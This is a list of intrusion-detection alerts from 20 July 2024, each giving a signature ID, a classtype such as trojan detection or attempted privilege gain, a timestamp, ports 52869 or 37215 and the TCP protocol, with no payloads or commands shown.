                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.588009
                      SID:2027339
                      Source Port:59924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.205247
                      SID:2025132
                      Source Port:48560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.100332
                      SID:2829579
                      Source Port:52630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.976791
                      SID:2025132
                      Source Port:57122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:09.237639
                      SID:2027339
                      Source Port:56754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634077
                      SID:2829579
                      Source Port:43372
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.217142
                      SID:2025132
                      Source Port:33120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.319876
                      SID:2027339
                      Source Port:45580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.260371
                      SID:2027339
                      Source Port:47304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.575986
                      SID:2831300
                      Source Port:59784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.030153
                      SID:2025132
                      Source Port:40604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:17.269055
                      SID:2831300
                      Source Port:51420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.634077
                      SID:2829579
                      Source Port:37082
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.832675
                      SID:2025132
                      Source Port:59242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.817297
                      SID:2835222
                      Source Port:60858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975513
                      SID:2835222
                      Source Port:45194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.304767
                      SID:2025132
                      Source Port:33306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.961047
                      SID:2027339
                      Source Port:55118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.190670
                      SID:2025132
                      Source Port:51900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.611391
                      SID:2027339
                      Source Port:38826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.545885
                      SID:2027339
                      Source Port:59122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634292
                      SID:2829579
                      Source Port:38768
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.415588
                      SID:2025132
                      Source Port:53256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.624686
                      SID:2027339
                      Source Port:45650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.700893
                      SID:2025132
                      Source Port:55240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.210798
                      SID:2027339
                      Source Port:46472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.725851
                      SID:2829579
                      Source Port:59222
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.984371
                      SID:2025132
                      Source Port:42256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.555718
                      SID:2027339
                      Source Port:35216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.165718
                      SID:2027339
                      Source Port:33260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2835222
                      Source Port:35458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.143446
                      SID:2025132
                      Source Port:52638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.962388
                      SID:2027339
                      Source Port:36968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2835222
                      Source Port:39668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2835222
                      Source Port:53410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.114673
                      SID:2835222
                      Source Port:48702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.343151
                      SID:2829579
                      Source Port:58374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:17.128772
                      SID:2027339
                      Source Port:41086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.111275
                      SID:2027339
                      Source Port:48622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.144955
                      SID:2025132
                      Source Port:57898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.109136
                      SID:2027339
                      Source Port:59800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.772130
                      SID:2025132
                      Source Port:59538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:11.592030
                      SID:2027339
                      Source Port:45658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221504
                      SID:2835222
                      Source Port:46632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.090121
                      SID:2027339
                      Source Port:43510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.021159
                      SID:2835222
                      Source Port:60526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.562013
                      SID:2831300
                      Source Port:44914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:32.076593
                      SID:2835222
                      Source Port:38906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.303669
                      SID:2027339
                      Source Port:52976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.660997
                      SID:2027339
                      Source Port:39540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.308763
                      SID:2027339
                      Source Port:53860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.547334
                      SID:2027339
                      Source Port:59954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.469876
                      SID:2025132
                      Source Port:49768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.099799
                      SID:2025132
                      Source Port:39852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2829579
                      Source Port:43118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.355589
                      SID:2835222
                      Source Port:57784
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.795218
                      SID:2831300
                      Source Port:55440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221550
                      SID:2829579
                      Source Port:41818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.478928
                      SID:2025132
                      Source Port:36668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.578727
                      SID:2027339
                      Source Port:48380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.589760
                      SID:2027339
                      Source Port:39636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.452219
                      SID:2025132
                      Source Port:50638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.975158
                      SID:2835222
                      Source Port:37716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.756264
                      SID:2831300
                      Source Port:49132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:06.393178
                      SID:2027339
                      Source Port:37356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.165469
                      SID:2025132
                      Source Port:48418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:14.945129
                      SID:2027339
                      Source Port:49536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2835222
                      Source Port:37038
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.843278
                      SID:2831300
                      Source Port:40052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.322110
                      SID:2831300
                      Source Port:46982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.783122
                      SID:2025132
                      Source Port:42202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.859884
                      SID:2025132
                      Source Port:57070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.484487
                      SID:2027339
                      Source Port:51798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.022245
                      SID:2027339
                      Source Port:51378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.825431
                      SID:2025132
                      Source Port:58434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.630649
                      SID:2829579
                      Source Port:43630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.294002
                      SID:2027339
                      Source Port:37170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.394890
                      SID:2027339
                      Source Port:60250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.511523
                      SID:2027339
                      Source Port:37662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.183470
                      SID:2025132
                      Source Port:47738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:42.973189
                      SID:2027339
                      Source Port:41250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.256492
                      SID:2027339
                      Source Port:51580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.919931
                      SID:2027339
                      Source Port:53412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.676169
                      SID:2027339
                      Source Port:49278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.298540
                      SID:2831300
                      Source Port:58416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.725077
                      SID:2025132
                      Source Port:33474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:03:46.099099
                      SID:2027339
                      Source Port:47524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2829579
                      Source Port:37338
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.034952
                      SID:2835222
                      Source Port:51042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2835222
                      Source Port:44866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572790
                      SID:2831300
                      Source Port:56760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2829579
                      Source Port:40842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.075937
                      SID:2835222
                      Source Port:55146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.472422
                      SID:2027339
                      Source Port:49628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221132
                      SID:2835222
                      Source Port:37174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.630767
                      SID:2835222
                      Source Port:46646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.916673
                      SID:2027339
                      Source Port:35716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.378872
                      SID:2025132
                      Source Port:38510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.677189
                      SID:2831300
                      Source Port:59056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.608320
                      SID:2027339
                      Source Port:53230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2835222
                      Source Port:53574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:17.110283
                      SID:2831300
                      Source Port:43866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.110861
                      SID:2835222
                      Source Port:57564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.651912
                      SID:2831300
                      Source Port:47200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.001980
                      SID:2027339
                      Source Port:40936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.297792
                      SID:2025132
                      Source Port:36240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.510385
                      SID:2027339
                      Source Port:44282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.881852
                      SID:2027339
                      Source Port:47792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.622888
                      SID:2027339
                      Source Port:57520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.790558
                      SID:2027339
                      Source Port:33926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.032492
                      SID:2835222
                      Source Port:53624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.580745
                      SID:2027339
                      Source Port:36440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2829579
                      Source Port:50554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.111685
                      SID:2025132
                      Source Port:39226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.160211
                      SID:2831300
                      Source Port:38978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2829579
                      Source Port:52098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.035496
                      SID:2829579
                      Source Port:34068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.598416
                      SID:2831300
                      Source Port:38364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.096837
                      SID:2831300
                      Source Port:39946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.897768
                      SID:2027339
                      Source Port:45198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.668802
                      SID:2831300
                      Source Port:37334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2829579
                      Source Port:36404
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.002255
                      SID:2027339
                      Source Port:38116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469869
                      SID:2027339
                      Source Port:53226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.641686
                      SID:2829579
                      Source Port:33626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.202325
                      SID:2835222
                      Source Port:49686
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:22.907274
                      SID:2027339
                      Source Port:36456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.139489
                      SID:2027339
                      Source Port:52264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.243266
                      SID:2027339
                      Source Port:59672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.994337
                      SID:2835222
                      Source Port:45722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.035135
                      SID:2025132
                      Source Port:57600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.212921
                      SID:2027339
                      Source Port:43722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.227281
                      SID:2025132
                      Source Port:47622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:14.728323
                      SID:2025132
                      Source Port:55190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.603339
                      SID:2025132
                      Source Port:56536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.269160
                      SID:2025132
                      Source Port:53070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.951862
                      SID:2025132
                      Source Port:55238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.158533
                      SID:2027339
                      Source Port:54662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2835222
                      Source Port:55840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.985320
                      SID:2027339
                      Source Port:34902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.648489
                      SID:2829579
                      Source Port:36536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.076593
                      SID:2829579
                      Source Port:53012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.688831
                      SID:2027339
                      Source Port:58266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.432917
                      SID:2027339
                      Source Port:36590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.459445
                      SID:2831300
                      Source Port:56400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.468217
                      SID:2027339
                      Source Port:54598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2835222
                      Source Port:60866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.985241
                      SID:2027339
                      Source Port:44076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2835222
                      Source Port:51534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.075937
                      SID:2829579
                      Source Port:45130
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.925038
                      SID:2027339
                      Source Port:36862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2835222
                      Source Port:49922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651187
                      SID:2829579
                      Source Port:49850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.218109
                      SID:2027339
                      Source Port:35668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.276859
                      SID:2027339
                      Source Port:52278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.643745
                      SID:2831300
                      Source Port:53628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.460493
                      SID:2025132
                      Source Port:41624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.024775
                      SID:2027339
                      Source Port:45402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.922661
                      SID:2027339
                      Source Port:41182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.198960
                      SID:2027339
                      Source Port:51080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.638879
                      SID:2831300
                      Source Port:36752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2829579
                      Source Port:43956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.036436
                      SID:2831300
                      Source Port:49572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.910590
                      SID:2027339
                      Source Port:46702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:15.172220
                      SID:2025132
                      Source Port:50336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.717611
                      SID:2027339
                      Source Port:56282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.114267
                      SID:2835222
                      Source Port:48818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.313163
                      SID:2831300
                      Source Port:48230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:04.942554
                      SID:2831300
                      Source Port:38780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.612377
                      SID:2027339
                      Source Port:38532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.688831
                      SID:2831300
                      Source Port:58266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:04.577562
                      SID:2027339
                      Source Port:52992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634497
                      SID:2829579
                      Source Port:41366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.593640
                      SID:2027339
                      Source Port:58574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.956762
                      SID:2027339
                      Source Port:42524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.004683
                      SID:2025132
                      Source Port:38520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.550538
                      SID:2027339
                      Source Port:49074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.018425
                      SID:2835222
                      Source Port:35004
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.863362
                      SID:2025132
                      Source Port:36226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.549758
                      SID:2027339
                      Source Port:50824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:22.606515
                      SID:2027339
